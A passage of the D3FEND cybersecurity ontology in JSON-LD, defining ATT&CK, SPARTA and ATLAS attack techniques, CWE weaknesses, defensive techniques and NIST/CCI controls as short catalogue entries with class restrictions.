          "@id": "d3f:d3fend-tactical-verb-property"
        }
      ]
    },
    {
      "@id": "d3f:DE-0011",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "DE-0011",
      "d3f:definition": "Threat actors may leverage valid credentials to conduct unauthorized actions against a spacecraft or related system in a way that conceals their presence and evades detection. By using trusted authentication mechanisms attackers can blend in with legitimate operations and avoid triggering access control alarms or anomaly detection systems. This technique enables evasion by appearing authorized, allowing adversaries to issue commands, access sensitive subsystems, or move laterally within spacecraft or constellation architectures without exploiting software vulnerabilities. When credential use is poorly segmented or monitored, this form of access can be used to maintain stealthy persistence or facilitate other tactics under the guise of legitimate activity.",
      "d3f:uses": {
        "@id": "d3f:Credential"
      },
      "rdfs:label": "Credentialed Evasion - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0011/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTADefenseEvasionTechnique"
        },
        {
          "@id": "_:N67209b2dcc4c43d6a5d835a76d6cb4a9"
        }
      ],
      "skos:prefLabel": "Credentialed Evasion"
    },
    {
      "@id": "_:N67209b2dcc4c43d6a5d835a76d6cb4a9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:uses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Credential"
      }
    },
    {
      "@id": "d3f:T1037.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1037.004",
      "d3f:definition": "Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify.",
      "d3f:modifies": {
        "@id": "d3f:SystemInitScript"
      },
      "rdfs:label": "RC Scripts",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1037"
        },
        {
          "@id": "_:N582bc616f2254bf2af26fcea32be31f6"
        }
      ]
    },
    {
      "@id": "_:N582bc616f2254bf2af26fcea32be31f6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemInitScript"
      }
    },
    {
      "@id": "d3f:RestoreEmail",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:RestoreEmail"
      ],
      "d3f:d3fend-id": "D3-RE",
      "d3f:definition": "Restoring an email for an entity to access.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-CybersecurityIncidentandVulnerabilityResponsePlaybooks"
      },
      "d3f:restores": {
        "@id": "d3f:Email"
      },
      "rdfs:label": "Restore Email",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:RestoreFile"
        },
        {
          "@id": "_:N30fa1db1989c4787840539c0980ed7e9"
        }
      ]
    },
    {
      "@id": "_:N30fa1db1989c4787840539c0980ed7e9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restores"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Email"
      }
    },
    {
      "@id": "d3f:RandomForest",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-RF",
      "d3f:definition": "Random Forest is a ML method that combines several other ML methods. At its core, Random Forest is an ensemble method of multiple bootstrapped decision trees filled with training data and random feature selection.",
      "d3f:kb-article": "## References\nRandom forest. Wikipedia.  [Link](https://en.wikipedia.org/wiki/Random_forest).",
      "rdfs:label": "Random Forest",
      "rdfs:subClassOf": {
        "@id": "d3f:BootstrapAggregating"
      }
    },
    {
      "@id": "d3f:EXF-0002.01",
      "@type": "owl:Class",
      "d3f:attack-id": "EXF-0002.01",
      "d3f:definition": "The attacker infers secrets by measuring instantaneous power consumption of target devices, often crypto engines or controllers, and correlating traces with hypothesized internal operations. Simple power analysis (SPA) extracts structure (operation sequences, key-dependent branches); differential/correlation power analysis (DPA/CPA) uses many traces and statistics to recover key bits from tiny data-dependent variations. Practically, measurements may come from instrumented rails during I&T, from a compromised payload monitoring local supplies, or from co-located hardware that senses current/voltage fluctuations. With sufficient traces and alignment (triggering on command/crypto invocation), internal values become observable through their power signatures.",
      "rdfs:label": "Power Analysis Attacks - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EXF-0002/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EXF-0002"
      },
      "skos:prefLabel": "Power Analysis Attacks"
    },
    {
      "@id": "d3f:CWE-572",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-572",
      "d3f:definition": "The product calls a thread's run() method instead of calling start(), which causes the code to run in the thread of the caller instead of the callee.",
      "rdfs:label": "Call to Thread run() instead of start()",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-821"
      }
    },
    {
      "@id": "d3f:evaluates",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x evaluates y: The entity x systematically assesses entity y to judge its state, quality, or risk.",
      "rdfs:label": "evaluates",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:may-evaluate"
        }
      ]
    },
    {
      "@id": "d3f:CCI-002179_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces the revocation of access authorizations resulting from changes to the security attributes of objects based on organization-defined rules governing the timing of revocations of access authorizations.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:SystemCallFiltering"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002179"
    },
    {
      "@id": "d3f:T1003.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1003.002",
      "d3f:definition": "Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the <code>net user</code> command. Enumerating the SAM database requires SYSTEM level access.",
      "d3f:may-access": [
        {
          "@id": "d3f:AuthenticationService"
        },
        {
          "@id": "d3f:Process"
        },
        {
          "@id": "d3f:SystemPasswordDatabase"
        }
      ],
      "rdfs:label": "Security Account Manager",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1003"
        },
        {
          "@id": "_:N35b103b82ced4626a75a328de4500836"
        },
        {
          "@id": "_:N17c38b07120148289402e984a7d4cdc3"
        },
        {
          "@id": "_:N235eb82b63794720af35f3873b40e0ad"
        }
      ]
    },
    {
      "@id": "_:N35b103b82ced4626a75a328de4500836",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AuthenticationService"
      }
    },
    {
      "@id": "_:N17c38b07120148289402e984a7d4cdc3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "_:N235eb82b63794720af35f3873b40e0ad",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemPasswordDatabase"
      }
    },
    {
      "@id": "d3f:CWE-289",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-289",
      "d3f:definition": "The product performs authentication based on the name of a resource being accessed, or the name of the actor performing the access, but it does not properly check all possible names for that resource or actor.",
      "rdfs:label": "Authentication Bypass by Alternate Name",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1390"
      }
    },
    {
      "@id": "d3f:WebApplicationFirewall",
      "@type": "owl:Class",
      "d3f:definition": "A web application firewall (or WAF) filters, monitors, and blocks HTTP traffic to and from a web application. A WAF is differentiated from a regular firewall in that a WAF is able to filter the content of specific web applications while regular firewalls serve as a safety gate between servers. By inspecting HTTP traffic, it can prevent attacks stemming from web application security flaws, such as SQL injection, cross-site scripting (XSS), file inclusion, and security misconfigurations.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Web_application_firewall"
      },
      "rdfs:label": "Web Application Firewall",
      "rdfs:subClassOf": {
        "@id": "d3f:ApplicationLayerFirewall"
      },
      "skos:altLabel": "WAF"
    },
    {
      "@id": "d3f:T1556.004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1556.004",
      "d3f:definition": "Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.",
      "rdfs:label": "Network Device Authentication",
      "rdfs:subClassOf": {
        "@id": "d3f:T1556"
      }
    },
    {
      "@id": "d3f:CWE-166",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-166",
      "d3f:definition": "The product receives input from an upstream component, but it does not handle or incorrectly handles when an expected special element is missing.",
      "rdfs:label": "Improper Handling of Missing Special Element",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-159"
        },
        {
          "@id": "d3f:CWE-228"
        },
        {
          "@id": "d3f:CWE-703"
        }
      ]
    },
    {
      "@id": "d3f:CWE-643",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-643",
      "d3f:definition": "The product uses external input to dynamically construct an XPath expression used to retrieve data from an XML database, but it does not neutralize or incorrectly neutralizes that input. This allows an attacker to control the structure of the query.",
      "rdfs:label": "Improper Neutralization of Data within XPath Expressions ('XPath Injection')",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-91"
        },
        {
          "@id": "d3f:CWE-943"
        }
      ]
    },
    {
      "@id": "d3f:TA0037",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "rdfs:label": "Command and Control - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Command and Control"
    },
    {
      "@id": "d3f:T1593.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1593.003",
      "d3f:definition": "Adversaries may search public code repositories for information about victims that can be used during targeting. Victims may store code in repositories on various third-party websites such as GitHub, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.",
      "rdfs:label": "Code Repositories",
      "rdfs:subClassOf": {
        "@id": "d3f:T1593"
      }
    },
    {
      "@id": "d3f:T1027",
      "@type": "owl:Class",
      "d3f:attack-id": "T1027",
      "d3f:definition": "Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.",
      "rdfs:label": "Obfuscated Files or Information",
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:OperationalDependencyMapping",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OperationalDependencyMapping"
      ],
      "d3f:d3fend-id": "D3-ODM",
      "d3f:definition": "Operational dependency mapping identifies and models the dependencies of the organization's activities on each other and on the organization's performers (people, systems, and services.)  This may include modeling the higher- and lower-level activities of an organization forming a hierarchy, or layering, of the dependencies in an organization's activities.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-CatiaUAFPlugin"
        },
        {
          "@id": "d3f:Reference-CyberCommandSystemCYCS"
        },
        {
          "@id": "d3f:Reference-DaggerFactSheet"
        },
        {
          "@id": "d3f:Reference-DaggerModelingAndVisualizationForMissionImpactSituationalAwareness"
        },
        {
          "@id": "d3f:Reference-MissionDependencyModelingForCyberSituationalAwareness"
        },
        {
          "@id": "d3f:Reference-UnifiedArchitectureFrameworkUAF"
        }
      ],
      "d3f:maps": [
        {
          "@id": "d3f:Dependency"
        },
        {
          "@id": "d3f:OperationalActivityPlan"
        }
      ],
      "rdfs:label": "Operational Dependency Mapping",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OperationalActivityMapping"
        },
        {
          "@id": "_:N79dd15e16eda443ab39aa6f94ef25bad"
        },
        {
          "@id": "_:N88105b6276ef43bf87df4c1a575f4c40"
        }
      ]
    },
    {
      "@id": "_:N79dd15e16eda443ab39aa6f94ef25bad",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:maps"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Dependency"
      }
    },
    {
      "@id": "_:N88105b6276ef43bf87df4c1a575f4c40",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:maps"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperationalActivityPlan"
      }
    },
    {
      "@id": "d3f:EmailSendEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where an email is transmitted from a client to a recipient via a mail server. This process often involves protocols such as SMTP or its secure variants, with potential authentication and encryption for secure delivery.",
      "rdfs:label": "Email Send Event",
      "rdfs:subClassOf": {
        "@id": "d3f:EmailEvent"
      }
    },
    {
      "@id": "d3f:CentralProcessingUnit",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:ProcessorRegister"
      },
      "d3f:definition": "A central processing unit (CPU), also called a central processor, main processor or just processor, is the electronic circuitry that executes instructions comprising a computer program. The CPU performs basic arithmetic, logic, controlling, and input/output (I/O) operations specified by the instructions in the program. This contrasts with external components such as main memory and I/O circuitry, and specialized processors such as graphics",
      "d3f:may-contain": [
        {
          "@id": "d3f:CacheMemory"
        },
        {
          "@id": "d3f:MemoryManagementUnit"
        },
        {
          "@id": "d3f:MemoryProtectionUnit"
        }
      ],
      "d3f:synonym": [
        "CPU",
        "Central Processor",
        "Main Processor"
      ],
      "rdfs:isDefinedBy": {
        "@id": "https://en.wikipedia.org/wiki/Central_processing_unit"
      },
      "rdfs:label": "Central Processing Unit",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Processor"
        },
        {
          "@id": "_:Ncf852adb3a4746288bd8725fb46e6cec"
        },
        {
          "@id": "_:N0b512f08a851496d9cce93e3b83bb964"
        },
        {
          "@id": "_:N7f771a82508c4557babc85d1150d59c1"
        },
        {
          "@id": "_:N29ad764f13b34bd18946727f68225971"
        }
      ]
    },
    {
      "@id": "_:Ncf852adb3a4746288bd8725fb46e6cec",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessorRegister"
      }
    },
    {
      "@id": "_:N0b512f08a851496d9cce93e3b83bb964",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CacheMemory"
      }
    },
    {
      "@id": "_:N7f771a82508c4557babc85d1150d59c1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryManagementUnit"
      }
    },
    {
      "@id": "_:N29ad764f13b34bd18946727f68225971",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryProtectionUnit"
      }
    },
    {
      "@id": "d3f:T1505.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:adds": {
        "@id": "d3f:Software"
      },
      "d3f:attack-id": "T1505.004",
      "d3f:definition": "Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: <code>Get{Extension/Filter}Version</code>, <code>Http{Extension/Filter}Proc</code>, and (optionally) <code>Terminate{Extension/Filter}</code>. IIS modules may also be installed to extend IIS web servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module 2013)",
      "rdfs:label": "IIS Components",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1505"
        },
        {
          "@id": "_:Nb3cc9982fa324dfab2fc1c99b8cf3242"
        }
      ]
    },
    {
      "@id": "_:Nb3cc9982fa324dfab2fc1c99b8cf3242",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:adds"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software"
      }
    },
    {
      "@id": "d3f:CWE-666",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-666",
      "d3f:definition": "The product performs an operation on a resource at the wrong phase of the resource's lifecycle, which can lead to unexpected behaviors.",
      "rdfs:label": "Operation on Resource in Wrong Phase of Lifetime",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-664"
      }
    },
    {
      "@id": "d3f:CWE-558",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-558",
      "d3f:definition": "The product uses the getlogin() function in a multithreaded context, potentially causing it to return incorrect values.",
      "rdfs:label": "Use of getlogin() in Multithreaded Application",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-663"
      }
    },
    {
      "@id": "d3f:T1667",
      "@type": "owl:Class",
      "d3f:attack-id": "T1667",
      "d3f:definition": "Adversaries may flood targeted email addresses with an overwhelming volume of messages. This may bury legitimate emails in a flood of spam and disrupt business operations.(Citation: sophos-bombing)(Citation: krebs-email-bombing)",
      "rdfs:label": "Email Bombing",
      "rdfs:subClassOf": {
        "@id": "d3f:ImpactTechnique"
      }
    },
    {
      "@id": "d3f:AML.T0074",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0074",
      "d3f:definition": "Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.",
      "rdfs:label": "Masquerading - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0074"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASDefenseEvasionTechnique"
      },
      "skos:prefLabel": "Masquerading"
    },
    {
      "@id": "d3f:AML.T0017.000",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0017.000",
      "d3f:definition": "Adversaries may develop their own adversarial attacks.\nThey may leverage existing libraries as a starting point ([Adversarial AI Attack Implementations](/techniques/AML.T0016.000)).\nThey may implement ideas described in public research papers or develop custom made attacks for the victim model.",
      "rdfs:label": "Adversarial AI Attacks - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0017.000"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0017"
      },
      "skos:prefLabel": "Adversarial AI Attacks"
    },
    {
      "@id": "d3f:CWE-375",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-375",
      "d3f:definition": "Sending non-cloned mutable data as a return value may result in that data being altered or deleted by the calling function.",
      "rdfs:label": "Returning a Mutable Object to an Untrusted Caller",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-668"
      }
    },
    {
      "@id": "d3f:AML.T0010.004",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0010.004",
      "d3f:definition": "An adversary may compromise a victim's container registry by pushing a manipulated container image and overwriting an existing container name and/or tag. Users of the container registry as well as automated CI/CD pipelines may pull the adversary's container image, compromising their AI Supply Chain. This can affect development and deployment environments.\n\nContainer images may include AI models, so the compromised image could have an AI model which was manipulated by the adversary (See [Manipulate AI Model](/techniques/AML.T0018)).",
      "rdfs:label": "Container Registry - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0010.004"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0010"
      },
      "skos:prefLabel": "Container Registry"
    },
    {
      "@id": "d3f:SoftwarePackagingTool",
      "@type": "owl:Class",
      "d3f:definition": "A tool that automates the process of packaging either or both binary code  and source code for use on one or more target platforms.",
      "rdfs:label": "Software Packaging Tool",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Build_automation"
        },
        {
          "@id": "dbr:Package_manager"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:BuildTool"
      }
    },
    {
      "@id": "d3f:T1666",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1666",
      "d3f:definition": "Adversaries may attempt to modify hierarchical structures in infrastructure-as-a-service (IaaS) environments in order to evade defenses.",
      "d3f:modifies": {
        "@id": "d3f:CloudConfiguration"
      },
      "rdfs:label": "Modify Cloud Resource Hierarchy",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "_:N9361d1fa22a44c199be56cfc3b508310"
        }
      ]
    },
    {
      "@id": "_:N9361d1fa22a44c199be56cfc3b508310",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CloudConfiguration"
      }
    },
    {
      "@id": "d3f:RemoteSession",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A remote login session is a login session where a client has logged in from their local host machine to a server via a network.",
      "rdfs:label": "Remote Session",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkSession"
      }
    },
    {
      "@id": "d3f:T1546.012",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1546.012",
      "d3f:definition": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., <code>C:\\dbg\\ntsd.exe -g  notepad.exe</code>). (Citation: Microsoft Dev Blog IFEO Mar 2010)",
      "d3f:modifies": {
        "@id": "d3f:SystemConfigurationDatabase"
      },
      "rdfs:label": "Image File Execution Options Injection",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1546"
        },
        {
          "@id": "_:N6bc9a27008834b87ac5205691a585071"
        }
      ]
    },
    {
      "@id": "_:N6bc9a27008834b87ac5205691a585071",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabase"
      }
    },
    {
      "@id": "d3f:CloudConfigurationModificationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event that updates cloud-hosted resource configurations such as IAM policies, virtual network constructs, storage settings, or managed-service parameters; impacting resource provisioning, access control, functionality, or compliance.",
      "rdfs:label": "Cloud Configuration Modification Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ConfigurationModificationEvent"
        },
        {
          "@id": "_:Naaa884e9713243958b253d088a2a0839"
        }
      ]
    },
    {
      "@id": "_:Naaa884e9713243958b253d088a2a0839",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CloudConfiguration"
      }
    },
    {
      "@id": "d3f:EX-0012.08",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0012.08",
      "d3f:definition": "ADCS depends on tightly coupled models and parameters: star-tracker catalogs and masks, sensor alignments and bias terms, gyro scale factors and drift rates, estimator covariances and process/measurement noise, controller gains and saturation limits, wheel/CMG torque constants, magnetic torquer maps, and sun sensor thresholds. Editing these values skews estimation or control, producing slow bias, limit cycles, loss of lock, or abrupt safing triggers. For example, a small change to a star-tracker mask can force frequent dropouts; an inflated gyro bias drives the filter away from truth; softened actuator limits or mis-set gains let disturbances accumulate; altered sun-point entry criteria cause unnecessary mode switches. Secondary impacts propagate to power, thermal, and communications because pointing and geometry underpin array generation, radiator view factors, and antenna gain. The technique turns the spacecraft against itself by nudging the parameters that close the loop between what the vehicle believes and how it responds.",
      "rdfs:label": "Attitude Determination & Control Subsystem - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0012/08/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0012"
      },
      "skos:prefLabel": "Attitude Determination & Control Subsystem"
    },
    {
      "@id": "d3f:recorded-in",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x recorded-in y: The event x is documented, logged, or otherwise preserved within the digital artifact y, which stores or encodes relevant data about the event.",
      "owl:inverseOf": {
        "@id": "d3f:records"
      },
      "rdfs:label": "recorded-in",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:CWE-941",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-941",
      "d3f:definition": "The product creates a communication channel to initiate an outgoing request to an actor, but it does not correctly specify the intended destination for that actor.",
      "rdfs:label": "Incorrectly Specified Destination in a Communication Channel",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-923"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_RA-3_3",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:FileAnalysis"
        },
        {
          "@id": "d3f:IdentifierAnalysis"
        },
        {
          "@id": "d3f:MessageAnalysis"
        },
        {
          "@id": "d3f:NetworkTrafficAnalysis"
        },
        {
          "@id": "d3f:PlatformMonitoring"
        },
        {
          "@id": "d3f:ProcessAnalysis"
        },
        {
          "@id": "d3f:UserBehaviorAnalysis"
        }
      ],
      "d3f:control-name": "Risk Assessment | Dynamic Threat Awareness",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "RA-3(3)"
    },
    {
      "@id": "d3f:C5.0",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-C5.",
      "d3f:definition": "C5.0 is the next version of C4.5, which in turn is the upgrade from ID3. The only difference between C5.0 and C4.5 is some improvements made to C5.0.",
      "d3f:kb-article": "## References\nC4.5 algorithm. Wikipedia. [Link](https://en.wikipedia.org/wiki/C4.5_algorithm).",
      "rdfs:label": "C5.0",
      "rdfs:subClassOf": {
        "@id": "d3f:DecisionTree"
      }
    },
    {
      "@id": "d3f:AgentAuthentication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:AgentAuthentication"
      ],
      "d3f:authenticates": {
        "@id": "d3f:Agent"
      },
      "d3f:d3fend-id": "D3-AA",
      "d3f:definition": "Agent authentication is the process of verifying the identities of agents to ensure they are authorized and trustworthy participants within a system.",
      "d3f:enables": {
        "@id": "d3f:Harden"
      },
      "d3f:kb-reference": {
        "@id": "d3f:Reference-NIST-Special-Publication-800-53-Revision-5"
      },
      "d3f:strengthens": {
        "@id": "d3f:UserAccount"
      },
      "rdfs:label": "Agent Authentication",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:N21cd21f6d6934bc49d336fd6fe2bd7f8"
        },
        {
          "@id": "_:Nd4636a3475f04e8680baba6a09bac422"
        },
        {
          "@id": "_:N00dd8341a8244b64b80825200cde0a05"
        }
      ]
    },
    {
      "@id": "_:N21cd21f6d6934bc49d336fd6fe2bd7f8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:authenticates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Agent"
      }
    },
    {
      "@id": "_:Nd4636a3475f04e8680baba6a09bac422",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Harden"
      }
    },
    {
      "@id": "_:N00dd8341a8244b64b80825200cde0a05",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:strengthens"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:HardeningEvent",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An event involving actions to strengthen defenses, such as applying patches or implementing secure configurations, reducing attack surfaces, and increasing the difficulty of exploitation by adversaries.",
      "d3f:related": {
        "@id": "d3f:Harden"
      },
      "rdfs:label": "Hardening Event",
      "rdfs:subClassOf": {
        "@id": "d3f:SecurityEvent"
      }
    },
    {
      "@id": "d3f:T0865",
      "@type": "owl:Class",
      "d3f:attack-id": "T0865",
      "d3f:definition": "Adversaries may use a spearphishing attachment, a variant of spearphishing, as a form of a social engineering attack against specific targets. Spearphishing attachments are different from other forms of spearphishing in that they employ malware attached to an email. All forms of spearphishing are electronically delivered and target a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T0863) to gain execution and access. (Citation: Enterprise ATT&CK October 2019)",
      "rdfs:label": "Spearphishing Attachment - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSInitialAccessTechnique"
      },
      "skos:prefLabel": "Spearphishing Attachment"
    },
    {
      "@id": "d3f:Reference-ApparatusForToProvideContentToAndQueryAReverseDomainNameSystemServer",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20100174829A1/en?oq=20100174829"
      },
      "d3f:kb-abstract": "An apparatus is disclosed for to provide content to and query a reverse domain name system (DNS) server without depending on the kindness of domain name system registrars, registrants. DNS replies are observed by firewalls or filters, analyzed, and transmitted to a reverse domain name system server. An embodiment of the present invention can be within a DNS server or SMTP server.",
      "d3f:kb-author": "Dean Danko",
